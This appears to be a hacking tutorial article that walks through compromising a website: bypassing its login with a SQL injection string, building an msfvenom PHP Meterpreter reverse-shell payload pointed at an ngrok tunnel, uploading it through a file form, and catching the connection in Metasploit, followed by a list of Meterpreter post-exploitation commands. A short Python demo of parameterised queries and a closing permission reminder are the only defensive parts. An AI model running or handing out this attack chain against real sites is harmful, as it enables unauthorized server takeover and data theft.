In a recent survey, only 15% of business owners saw security as a challenge, even though more than half reported having been hacked; and of those, only 6% of small businesses have nobody at all handling their online security.

More people have access to the Internet than ever before, which has prompted many organizations to build web-based applications through which users interact with them online. Poorly written web application code can be exploited to gain unauthorized access to sensitive data and to the web servers themselves.

In this article, we introduce you to web application hacking techniques and the countermeasures you can put in place to protect against such attacks.

Requirements –

A vulnerable website/application

Ngrok – Secure tunnel

Msfvenom and Msfconsole

Most web applications are hosted on public servers reachable from the Internet, which makes them easy for anyone to probe and attack. The following are common web application threats.

SQL Injection

Denial of Service Attacks

XSS Attacks

CSRF Attacks

File Inclusion Attacks

Session/Cookie Hijacking

Code Injection

Defacement

In this practical scenario, we are going to hack the admin panel of a website through string-based SQL injection, then upload a malicious payload through a form's file upload field, and finally get a reverse connection in Meterpreter.

The first step is to bypass the login panel via string-based SQL injection. SQL injection is one of the most common web hacking techniques and usually occurs when user input, such as a username and password, is concatenated directly into a database query. An attacker can bypass the login by entering ' or ''=' (a single quote, the word or, two single quotes, an equals sign and one more single quote) into both the username and the password text boxes, as shown below. The server then builds a WHERE clause of the form username='' or ''='' AND password='' or ''='', and because ''='' is always true the query matches every user, so the first row returned, often the administrator, is logged in:
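To see exactly why that string works, and what the fix looks like, here is an added example that is not code from the original article or from the target site: it models the login query in Python against an in-memory SQLite table. The table, the `admin` credentials and the `build_query`, `vulnerable_login` and `safe_login` names are constructed for this illustration; the vulnerable version concatenates the input into the SQL the way the article's login panel is assumed to, and the parameterised version is the countermeasure.

```python
import sqlite3

# Constructed demo table; the real target's schema is not known from the article.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Cleartext password only to keep the demo short; a real app stores a salted hash.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    return db

def build_query(username, password):
    """How a vulnerable login panel builds its SQL: user input pasted straight into the string."""
    return ("SELECT id FROM users WHERE username='" + username
            + "' AND password='" + password + "'")

def vulnerable_login(db, username, password):
    """Executes the concatenated query; quotes in the input become part of the SQL grammar."""
    return db.execute(build_query(username, password)).fetchone() is not None

def safe_login(db, username, password):
    """Parameterised query: the driver binds the values as data, so quotes in the input
    cannot change the structure of the statement."""
    row = db.execute("SELECT id FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row is not None

# The string from the article, in plain ASCII quotes.
BYPASS = "' or ''='"

def demo():
    db = make_db()
    return {
        "query_seen_by_db": build_query(BYPASS, BYPASS),
        "vulnerable_real_creds": vulnerable_login(db, "admin", "S3cret!"),
        "vulnerable_bypass": vulnerable_login(db, BYPASS, BYPASS),
        "safe_real_creds": safe_login(db, "admin", "S3cret!"),
        "safe_bypass": safe_login(db, BYPASS, BYPASS),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the bypass string in both fields the database sees `WHERE username='' or ''='' AND password='' or ''=''`. Because AND binds tighter than OR, that reads as `username='' OR (''='' AND password='') OR ''=''`, and the last term is always true, so every row matches. The parameterised version looks for a user literally named `' or ''='` and finds none; the only real fix is to stop building SQL from strings, not to filter quotes.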

If you successfully bypass the login page with the SQL injection, the next step is to set up an ngrok tunnel so that the compromised web server can reach your listener over the Internet/WAN even though your machine sits behind NAT or a firewall.

For this, go to ngrok.com, create a free account and download the package for your architecture.

After creating the account, unzip the package with the command “unzip <package name>” and install your authtoken, shown in the above screenshot, with the command “./ngrok authtoken <your token>“.

Now start an ngrok TCP tunnel to local port 4444 by typing “./ngrok tcp 4444“. You can choose any port depending on your need; it is the port your Metasploit handler will listen on.

The above command prints a public forwarding address, tcp://0.tcp.ngrok.io with port 18290, which accepts remote connections and forwards them to the same local port, 4444, that you gave in the ngrok command.

So here, for the payload, LHOST = 0.tcp.ngrok.io and LPORT = 18290. Both the public port and possibly the hostname are assigned by ngrok and change each time you restart the tunnel, so regenerate the payload if you do.

The next step is to create a malicious payload using the msfvenom utility, which is installed by default in Kali Linux.

Command: msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18290 R > hack.php

Here -p selects the payload and R requests raw output (the same as -f raw in current msfvenom versions), which for a PHP payload means the plain PHP source that the web server will execute.

Your hack.php file is now saved in your current directory (/root when working as root on Kali). You need to upload it to the hacked website via any internal form that has a file browse/upload field. On the site above, we bypassed the login panel and then, by luck, found a PHP form with file upload functionality through which we successfully uploaded our malicious file to the server.

The next step is to find the path of the uploaded file. If the server has directory listing enabled you can find it easily through the “Index of /” listing (the same thing the well-known Google dork searches for). In this case our file was stored as “150135111_hack.php“: the server prefixed a number but kept the original .php extension, so the file is still executable by the web server.

Once your payload is uploaded to the remote server by whatever technique, you need to run the Metasploit Framework to catch the reverse connection. To start it, type “msfconsole” in your terminal.

Here we'll use the multi/handler module by typing “use exploit/multi/handler” in the same terminal, and select the matching payload with “set payload php/meterpreter/reverse_tcp“.

Here you need to set your LHOST and LPORT. If you are using ngrok or any other tunnel service, the handler's LHOST will always be 0.0.0.0 (listen on all local interfaces) and its LPORT must be the local port the tunnel forwards to, 4444 in this example, not the public ngrok port that you put in the payload. If you are using Metasploit on the LAN instead, set LHOST to your local IP address, which you can get by typing “ifconfig” in your terminal, and use the same LPORT in both the payload and the handler.

As soon as you run “exploit” in Metasploit and open the uploaded file (here 150135111_hack.php) in your browser, you will instantly get the reverse Meterpreter connection over the Internet.

In the above screenshot you can see that you've successfully entered the remote server. Type “ls” to list the files in the current directory on the remote server.

The command “pwd” gives you the current path on the remote server, which is the directory your malicious file was uploaded to.

Here is a list of commands you can use in Meterpreter.

? – Help menu

background – Backgrounds the current session

bgkill – Kills a background meterpreter script

bglist – Lists running background scripts

bgrun – Executes a meterpreter script as a background thread

channel – Displays information or control active channels

close – Closes a channel

disable_unicode_encoding – Disables encoding of unicode strings

enable_unicode_encoding – Enables encoding of unicode strings

exit – Terminate the meterpreter session

get_timeouts – Get the current session timeout values

help – Help menu

info – Displays information about a Post module

irb – Drop into irb scripting mode

load – Load one or more meterpreter extensions

machine_id – Get the MSF ID of the machine attached to the session

migrate – Migrate the server to another process

quit – Terminate the meterpreter session

read – Reads data from a channel

resource – Run the commands stored in a file

run – Executes a meterpreter script or Post module

sessions – Quickly switch to another session

set_timeouts – Set the current session timeout values

sleep – Force Meterpreter to go quiet, then re-establish session.

transport – Change the current transport mechanism

use – Deprecated alias for ‘load’

uuid – Get the UUID for the current session

write – Writes data to a channel

cat – Read the contents of a file to the screen

cd – Change directory

checksum – Retrieve the checksum of a file

cp – Copy source to destination

dir – List files (alias for ls)

download – Download a file or directory

edit – Edit a file

getlwd – Print local working directory

getwd – Print working directory

lcd – Change local working directory

lpwd – Print local working directory

ls – List files

mkdir – Make directory

mv – Move source to destination

pwd – Print working directory

rm – Delete the specified file

rmdir – Remove directory

search – Search for files

upload – Upload a file or directory

portfwd – Forward a local port to a remote service

execute – Execute a command

getenv – Get one or more environment variable values

getpid – Get the current process identifier

getuid – Get the user that the server is running as

kill – Terminate a process

localtime – Displays the target system’s local date and time

pgrep – Filter processes by name

pkill – Terminate processes by name

ps – List running processes

shell – Drop into a system command shell

sysinfo – Gets information about the remote system, such as OS

You can also get a malicious file onto the server via file inclusion attacks, which we will discuss separately.

Note: Be careful when attempting this against a live website; only test systems you have explicit permission to attack. For testing and learning purposes, use a deliberately vulnerable machine such as DVWA or bWAPP.